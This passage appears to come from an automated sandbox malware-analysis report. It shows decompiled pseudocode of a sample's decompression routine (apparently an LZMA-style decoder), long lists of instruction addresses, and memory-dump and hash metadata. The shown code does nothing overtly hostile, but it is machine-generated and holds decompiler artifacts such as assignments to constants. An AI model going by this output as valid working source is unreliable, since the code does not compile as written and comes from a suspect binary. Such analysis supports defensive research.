								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x004067b7
0x004067be
0x004067c4
0x004067ca
0x00000000
0x004067ce
0x004067da
0x004067da
0x004067da
0x004067e3
0x00000000
0x00000000
0x004067e9
0x00000000
0x004067f0
0x004067f4
0x00000000
0x00000000
0x004067fd
0x00406800
0x00406803
0x00406805
0x00406807
0x00000000
0x00000000
0x0040680d
0x00406810
0x00406812
0x00406813
0x00406816
0x00406818
0x00406819
0x0040681b
0x0040681e
0x00406823
0x00406828
0x00406831
0x00406844
0x00406847
0x00406850
0x00406853
0x0040687b
0x0040687b
0x0040687d
0x0040688b
0x0040688b
0x0040688f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040687f
0x0040687f
0x00406882
0x00406882
0x00406883
0x00406883
0x00000000
0x0040687f
0x00406855
0x00406859
0x0040685e
0x0040685e
0x00406867
0x0040686d
0x0040686f
0x00406872
0x00000000
0x00406878
0x00406878
0x00000000
0x00406878
0x00000000
0x00406895
0x00406895
0x00406899
0x00407145
0x00000000
0x00407145
0x004068a2
0x004068b2
0x004068b5
0x004068b8
0x004068b8
0x004068b8
0x004068bb
0x004068bb
0x004068bf
0x00000000
0x00000000
0x004068c1
0x004068c4
0x004068c7
0x004068f1
0x004068f7
0x004068fe
0x00000000
0x004068fe
0x004068c9
0x004068cd
0x004068d0
0x004068d5
0x004068d5
0x004068e0
0x004068e6
0x004068e8
0x004068eb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406930
0x00406936
0x00406939
0x00406946
0x0040694e
0x00000000
0x00000000
0x00406905
0x00406905
0x00406909
0x00407154
0x00000000
0x00407154
0x00406915
0x00406920
0x00406920
0x00406920
0x00406923
0x00406926
0x00406929
0x0040692c
0x0040692e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fc5
0x00406fc5
0x00406fcb
0x00406fd1
0x00406fd4
0x00406fd7
0x00406ff1
0x00406ff4
0x00406ffa
0x00407005
0x00407005
0x00407007
0x00406fd9
0x00406fd9
0x00406fe8
0x00406fec
0x00406fec
0x0040700a
0x00407011
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407013
0x00407013
0x00407017
0x004071c6
0x00000000
0x004071c6
0x00407023
0x0040702a
0x00407032
0x00407032
0x00407032
0x00407035
0x00407038
0x00407038
0x00000000
0x00000000
0x00406956
0x00406958
0x0040695b
0x004069cc
0x004069cf
0x004069d2
0x004069d9
0x004069e3
0x00000000
0x004069e3
0x0040695d
0x00406961
0x00406964
0x00406966
0x00406969
0x0040696c
0x0040696e
0x00406971
0x00406973
0x00406978
0x0040697b
0x0040697e
0x00406982
0x00406989
0x0040698c
0x00406993
0x00406997
0x0040699f
0x0040699f
0x0040699f
0x00406999
0x00406999
0x00406999
0x0040698e
0x0040698e
0x0040698e
0x004069a3
0x004069a6
0x004069c4
0x004069c6
0x00000000
0x004069c6
0x004069a8
0x004069ab
0x004069ae
0x004069b1
0x004069b3
0x004069b3
0x004069b3
0x004069b6
0x004069b9
0x004069bb
0x004069bc
0x004069bf
0x00000000
0x00000000
0x00406bf5
0x00406bf9
0x00406c17
0x00406c1a
0x00406c21
0x00406c24
0x00406c27
0x00406c2a
0x00406c2d
0x00406c30
0x00406c32
0x00406c39
0x00406c3a
0x00406c3c
0x00406c3f
0x00406c42
0x00406c45
0x00406c45
0x00406c4a
0x00000000
0x00406c4a
0x00406bfb
0x00406bfe
0x00406c01
0x00406c0b
0x00000000
0x00000000
0x00406c5f
0x00406c63
0x00406c86
0x00406c89
0x00406c8c
0x00406c96
0x00406c65
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c7b
0x00406c7e
0x00406c7e
0x00000000
0x00000000
0x00406ca2
0x00406ca6
0x00000000
0x00000000
0x00406cac
0x00406cb0
0x00000000
0x00000000
0x00406cb6
0x00406cb8
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc3
0x00000000
0x00000000
0x00406d13
0x00406d17
0x00406d1e
0x00406d21
0x00406d24
0x00406d2e
0x00000000
0x00406d2e
0x00406d19
0x00000000
0x00000000
0x00406d3a
0x00406d3e
0x00406d45
0x00406d48
0x00406d4b
0x00406d40
0x00406d40
0x00406d40
0x00406d4e
0x00406d51
0x00406d54
0x00406d54
0x00406d57
0x00406d5a
0x00406d5d
0x00406d5d
0x00406d60
0x00406d67
0x00406d6c
0x00000000
0x00000000
0x00406dfa
0x00406dfa
0x00406dfe
0x0040719c
0x00000000
0x0040719c
0x00406e04
0x00406e07
0x00406e0a
0x00406e0e
0x00406e11
0x00406e17
0x00406e19
0x00406e19
0x00406e19
0x00406e1c
0x00406e1f
0x00000000
0x00000000
0x004069ef
0x004069ef
0x004069f3
0x00407160
0x00000000
0x00407160
0x004069f9
0x004069fc
0x004069ff
0x00406a03
0x00406a06
0x00406a0c
0x00406a0e
0x00406a0e
0x00406a0e
0x00406a11
0x00406a14
0x00406a14
0x00406a17
0x00406a1a
0x00000000
0x00000000
0x00406a20
0x00406a26
0x00000000
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x00406a33
0x00406a36
0x00406a39
0x00406a3c
0x00406a3d
0x00406a40
0x00406a42
0x00406a48
0x00406a4b
0x00406a4e
0x00406a51
0x00406a54
0x00406a57
0x00406a5a
0x00406a76
0x00406a79
0x00406a7c
0x00406a7f
0x00406a86
0x00406a8a
0x00406a8c
0x00406a90
0x00406a5c
0x00406a5c
0x00406a60
0x00406a68
0x00406a6d
0x00406a6f
0x00406a71
0x00406a71
0x00406a93
0x00406a9a
0x00406a9d
0x00000000
0x00406aa3
0x00000000
0x00406aa3
0x00000000
0x00406aa8
0x00406aa8
0x00406aac
0x0040716c
0x00000000
0x0040716c
0x00406ab2
0x00406ab5
0x00406ab8
0x00406abc
0x00406abf
0x00406ac5
0x00406ac7
0x00406ac7
0x00406ac7
0x00406aca
0x00406acd
0x00406acd
0x00406acd
0x00406ad3
0x00000000
0x00000000
0x00406ad5
0x00406ad8
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae7
0x00406aea
0x00406aed
0x00406af0
0x00406af3
0x00406b0b
0x00406b0e
0x00406b11
0x00406b14
0x00406b14
0x00406b17
0x00406b1b
0x00406b1d
0x00406af5
0x00406af5
0x00406afd
0x00406b02
0x00406b04
0x00406b06
0x00406b06
0x00406b20
0x00406b27
0x00406b2a
0x00000000
0x00406b2c
0x00000000
0x00406b2c
0x00406b2a
0x00406b31
0x00406b31
0x00406b31
0x00406b31
0x00000000
0x00000000
0x00406b6c
0x00406b6c
0x00406b70
0x00407178
0x00000000
0x00407178
0x00406b76
0x00406b79
0x00406b7c
0x00406b80
0x00406b83
0x00406b89
0x00406b8b
0x00406b8b
0x00406b8b
0x00406b8e
0x00406b91
0x00406b91
0x00406b97
0x00406b35
0x00406b35
0x00406b38
0x00000000
0x00406b38
0x00406b99
0x00406b99
0x00406b9c
0x00406b9f
0x00406ba2
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb7
0x00406bcf
0x00406bd2
0x00406bd5
0x00406bd8
0x00406bd8
0x00406bdb
0x00406bdf
0x00406be1
0x00406bb9
0x00406bb9
0x00406bc1
0x00406bc6
0x00406bc8
0x00406bca
0x00406bca
0x00406be4
0x00406beb
0x00406bee
0x00000000
0x00406bf0
0x00000000
0x00406bf0
0x00000000
0x00406e7d
0x00406e7d
0x00406e81
0x004071a8
0x00000000
0x004071a8
0x00406e87
0x00406e8a
0x00406e8d
0x00406e91
0x00406e94
0x00406e9a
0x00406e9c
0x00406e9c
0x00406e9c
0x00406e9f
0x00000000
0x00000000
0x00406c4d
0x00406c4d
0x00406c50
0x00000000
0x00000000
0x00406f8c
0x00406f90
0x00406fb2
0x00406fb5
0x00406fbf
0x00406fc2
0x00406fc2
0x00000000
0x00406fc2
0x00406f92
0x00406f95
0x00406f99
0x00406f9c
0x00406f9c
0x00406f9f
0x00000000
0x00000000
0x00407049
0x0040704d
0x0040706b
0x0040706b
0x0040706b
0x00407072
0x00407079
0x00407080
0x00407080
0x00000000
0x00407080
0x0040704f
0x00407052
0x00407055
0x00407058
0x0040705f
0x00406fa3
0x00406fa3
0x00406fa6
0x00000000
0x00000000
0x0040713a
0x0040713d
0x00000000
0x00000000
0x00406d74
0x00406d76
0x00406d7d
0x00406d7e
0x00406d80
0x00406d83
0x00000000
0x00000000
0x00406d8b
0x00406d8e
0x00406d91
0x00406d93
0x00406d95
0x00406d95
0x00406d96
0x00406d99
0x00406da0
0x00406da3
0x00406db1
0x00000000
0x00000000
0x00407087
0x00407087
0x0040708a
0x00407091
0x00000000
0x00000000
0x00407096
0x00407096
0x0040709a
0x004071d2
0x00000000
0x004071d2
0x004070a0
0x004070a3
0x004070a6
0x004070aa
0x004070ad
0x004070b3
0x004070b5
0x004070b5
0x004070b5
0x004070b8
0x004070bb
0x004070bb
0x004070bb
0x004070bb
0x004070be
0x004070be
0x004070c2
0x00407122
0x00407125
0x0040712a
0x0040712b
0x0040712d
0x0040712f
0x00407132
0x0040703e
0x0040703e
0x00000000
0x0040703e
0x004070c4
0x004070ca
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e5
0x004070fe
0x00407101
0x00407104
0x00407107
0x0040710b
0x0040710d
0x0040710d
0x0040710e
0x00407111
0x004070e7
0x004070e7
0x004070ef
0x004070f4
0x004070f6
0x004070f9
0x004070f9
0x00407114
0x0040711b
0x00000000
0x0040711d
0x00000000
0x0040711d
0x00000000
0x00406db9
0x00406dbc
0x00406df2
0x00406f22
0x00406f22
0x00406f22
0x00406f22
0x00406f25
0x00406f25
0x00406f28
0x00406f2a
0x004071b4
0x00000000
0x004071b4
0x00406f30
0x00406f33
0x00000000
0x00000000
0x00406f39
0x00406f3d
0x00406f40
0x00406f40
0x00406f40
0x00000000
0x00406f40
0x00406dbe
0x00406dc0
0x00406dc2
0x00406dc4
0x00406dc7
0x00406dc8
0x00406dca
0x00406dcc
0x00406dcf
0x00406dd2
0x00406de8
0x00406ded
0x00406e25
0x00406e25
0x00406e29
0x00406e55
0x00406e57
0x00406e5e
0x00406e61
0x00406e64
0x00406e64
0x00406e69
0x00406e69
0x00406e6b
0x00406e6e
0x00406e75
0x00406e78
0x00406ea5
0x00406ea5
0x00406ea8
0x00406eab
0x00406f1f
0x00406f1f
0x00406f1f
0x00000000
0x00406f1f
0x00406ead
0x00406eb3
0x00406eb6
0x00406eb9
0x00406ebc
0x00406ebf
0x00406ec2
0x00406ec5
0x00406ec8
0x00406ecb
0x00406ece
0x00406ee7
0x00406ee9
0x00406eec
0x00406eed
0x00406ef0
0x00406ef2
0x00406ef5
0x00406ef7
0x00406ef9
0x00406efc
0x00406efe
0x00406f01
0x00406f05
0x00406f07
0x00406f07
0x00406f08
0x00406f0b
0x00406f0e
0x00406ed0
0x00406ed0
0x00406ed8
0x00406edd
0x00406edf
0x00406ee2
0x00406ee2
0x00406f11
0x00406f18
0x00406ea2
0x00406ea2
0x00406ea2
0x00406ea2
0x00000000
0x00406f1a
0x00000000
0x00406f1a
0x00406f18
0x00406e2b
0x00406e2e
0x00406e30
0x00406e33
0x00406e36
0x00406e39
0x00406e3b
0x00406e3e
0x00406e41
0x00406e41
0x00406e44
0x00406e44
0x00406e47
0x00406e4e
0x00406e22
0x00406e22
0x00406e22
0x00406e22
0x00000000
0x00406e50
0x00000000
0x00406e50
0x00406e4e
0x00406dd4
0x00406dd7
0x00406dd9
0x00406ddc
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407184
0x00000000
0x00407184
0x00406b45
0x00406b48
0x00406b4b
0x00406b4e
0x00406b51
0x00406b54
0x00406b57
0x00406b59
0x00406b5c
0x00406b5f
0x00406b62
0x00406b64
0x00406b64
0x00406b64
0x00000000
0x00000000
0x00406cc6
0x00406cc6
0x00406cca
0x00407190
0x00000000
0x00407190
0x00406cd0
0x00406cd3
0x00406cd6
0x00406cd9
0x00406cdb
0x00406cdb
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce7
0x00406cea
0x00406ced
0x00406cee
0x00406cf0
0x00406cf0
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cfc
0x00406cfc
0x00406cff
0x00406d01
0x00406d01
0x00000000
0x00000000
0x00406f43
0x00406f43
0x00406f43
0x00406f47
0x00000000
0x00000000
0x00406f4d
0x00406f50
0x00406f53
0x00406f56
0x00406f58
0x00406f58
0x00406f58
0x00406f5b
0x00406f5e
0x00406f61
0x00406f64
0x00406f67
0x00406f6a
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00406f70
0x00406f73
0x00406f76
0x00406f79
0x00406f7c
0x00406f80
0x00406f82
0x00406f85
0x00000000
0x00406f87
0x00406d04
0x00406d04
0x00000000
0x00406d04
0x00406f85
0x004071ba
0x004071dc
0x004071e2
0x004071e4
0x004071eb
0x00000000
0x00000000
0x004067e9
0x004071f1
0x004071f1
0x00000000

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406BF5 Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406BF5() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004071F9))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4)); // executed
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
